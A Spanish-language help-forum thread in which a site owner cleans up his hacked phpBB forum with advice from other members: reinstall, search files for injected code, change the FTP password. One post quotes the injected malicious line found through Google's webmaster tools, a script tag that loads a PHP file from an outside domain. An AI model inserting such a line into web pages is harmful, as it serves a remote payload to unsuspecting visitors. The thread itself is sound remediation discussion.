Me han hackeado el foro

[Turbooo]

Hola amigos

Pues eso, he entrado hoy en el foro y me he dado cuanta de este pastelón

Me han mandado un mensaje los de google y me han avisado

No se podia acceder al el, daba muchos errores.
Mi solución ha sido borrar todo e actualizar el foro directamente. acabo de hacerlo y sigo viendo el foro un poco raro
Si entrais en el os dareis cuenta.

No se que hacer más, hay alguna forma de arreglarlo???

[angelismo]

Normal que te hayan hackeado teniendo phpbb 3.0.5.
Lo unico raro que veo son las tablas de los foros ,que no aparecen como deben ,lo mejor pue puedes hacer es actualizar a phpbb 3.0.7 -PL1 ,y si no quieres actualizar resube los archivos de la plantilla prosilver.

[Turbooo]

ya la he instalado directamente la version 3.0.7 pl1

y eso que dices tambien me aparecia cuando lo tenia en la 3.0.5

creo q no he borrado el hackeo

[HuanManwe]

el otro día te avisé de que debías limpiar algunos archivos y CAMBIAR la contraseña del FTP. ¿Lo hiciste? Es lo que deberías hacer ahora.

[Turbooo]

el otro día te avisé de que debías limpiar algunos archivos y CAMBIAR la contraseña del FTP. ¿Lo hiciste? Es lo que deberías hacer ahora.

si que lo hice!!

pero eso me paso en un subdominio que tengo en mi hosting, en una web en flash. Borré un codigo que estaba en el index.html y listo.

Pero ahora se han metido en el foro.

He borrado todos los archivo desde FTP menos el confg.php y he subido la actualización 3.0.7 pl-1

El caso es que sigue el problema, se ha desfigurado el foro y el portal

Como puedo quitar eso??
Que se hace en estos casos??
Gracias por todo de antemano

[engendro666]

menudo rollo que tienes con la actualizacion, ya hace tiempo que estas ene so. Porque mejor no instalas un phpbb de 0 ( y te deshaces de paso de cualquier codigo mailicioso que tuvieras) luego que este funcionando te ayudamos a mudar base de datos y adaptar tu estilo . Yo actualice de esta manera de 3.0.5 a 3.0.6. Solo actualice la BD en local y luego la subi al foro nuevo

[karbiko]

Si turbo...
Los que estamos alojados en 1and1 me da que tendremos que hacerlo de esa manera.. pra poder estar actualizados
En mi caso una puñeta es el tener que volver a configurar los mods y, sobre todo, la configuración de acceso al chat de sólo los usuarios de un determinado grupo y que logré con la ayuda de Mitch..

Además de actualizar los bbcodes, que no se si ya está resuelto el uso de tildes con los Simpletext, o si lo permite el nuevo Tag....

Cagoenlalechedelosalemaneséstos...coñeYa nos veremos en la renovación del hosting...

[Turbooo]

menudo rollo que tienes con la actualizacion, ya hace tiempo que estas ene so. Porque mejor no instalas un phpbb de 0 ( y te deshaces de paso de cualquier codigo mailicioso que tuvieras) luego que este funcionando te ayudamos a mudar base de datos y adaptar tu estilo . Yo actualice de esta manera de 3.0.5 a 3.0.6. Solo actualice la BD en local y luego la subi al foro nuevo

si es lo que he hecho colega!!

borré todo, subi la version 3.0.7 pl-1 más mi archivo config.php.

si hubiese algo estaria en los archivos que borré

A no se que lo malicioso esté en la bd, que no creo.

Esto me esta volviendo loco tiOO

[HuanManwe]

¿cuándo empezó el problema? Mira la fecha de última modificación de los archivos de tu foro y mira el código de los archivos editados más o menos unas horas antes desde que descubrieras el problema. El mensaje habla de código malicioso insertado, así que debes mirar los archivos y buscar ese código para poder eliminarlo. Mira también en el config.php

Por lo que dice el mensaje de Google el contenido pone biscuit fede ration . com (quitando los espacios en blanco)

[Turbooo]

¿cuándo empezó el problema? Mira la fecha de última modificación de los archivos de tu foro y mira el código de los archivos editados más o menos unas horas antes desde que descubrieras el problema. El mensaje habla de código malicioso insertado, así que debes mirar los archivos y buscar ese código para poder eliminarlo. Mira también en el config.php

Por lo que dice el mensaje de Google el contenido pone biscuit fede ration . com (quitando los espacios en blanco)

El problema ha empezado hoy mismo

el código malicioso al parecer es este

Spoiler

<script src=http://biscuitfederation.com/library/members_old
.php ></script>

Lo he sacado de Herramientas de webmaster de google, en la seccion de Software malintencionado

HuanManwe colega que razón tenias, me he fijado en el archivo config.php había un código super largo, lo he borrado.

Pero no se donde más buscar, ahora que me acuerdo también dejé las carpetas "files" e "images" antiguas, ya que tengo muchas images subidas

Las borro??

[HuanManwe]

abre todos los archivos de la raiz del foro, con el notepad++, por ejemplo y busca en todos los documentos lo de biscuit, y elimina ese código. Luego haz lo mismo con los archivos de los subdirectorios.

[Turbooo]

abre todos los archivos de la raiz del foro, con el notepad++, por ejemplo y busca en todos los documentos lo de biscuit, y elimina ese código. Luego haz lo mismo con los archivos de los subdirectorios.

HuanManwe UN MILLÓN DE GRACIAS "PICHA"

Ya lo he arreglado, sin ti no lo podra a ver hecho, gracias

La verdad que esto me ha venido bien para actuaizar el foro de una vez por todas, aunque haya tenido que sacrificar todos los mods que tenia. Empezaré a meterles uno a uno.

Q cabr*****s los que me hayan hecho eso, por que hay gente asi dios mio, que se mete con los más debiles.
Esperemos que no vuleva a ocurrir

[HuanManwe]

[andalú]y no orvíeh cambiá er páhguor der uzuario der efetepé, pisha[/andalú]

Y limpia bien los archivos de la página principal, porque en http://www.tarifabikes.com/ me sigue saliendo el mensaje ese de advertencia. Recuerda que si te han hecho esto hoy quiere decir que la contraseña que tenías no era muy fuerte. Pon alguna palabra larga y mezclando números y mayúsculas y minúsculas.

[Turbooo]

[andalú]y no orvíeh cambiá er páhguor der uzuario der efetepé, pisha[/andalú]

Y limpia bien los archivos de la página principal, porque en http://www.tarifabikes.com/ me sigue saliendo el mensaje ese de advertencia. Recuerda que si te han hecho esto hoy quiere decir que la contraseña que tenías no era muy fuerte. Pon alguna palabra larga y mezclando números y mayúsculas y minúsculas.

Jejejejejeje !!!

Ya cambié la contraseña por una buena

y creo q esta todo listo, borras las cookies de mi foro e intenta entrar otra vez, veras como ya no te avisa

saludos "picha" (menos mal que eres de Málaga y sabes que no es un insulto!!!)

[HuanManwe]

cuando intento entrar a http://www.tarifabikes.com/ me salta el mensaje... Prueba con todos y cada uno de los .php y los .htm y similares. Algo pasa.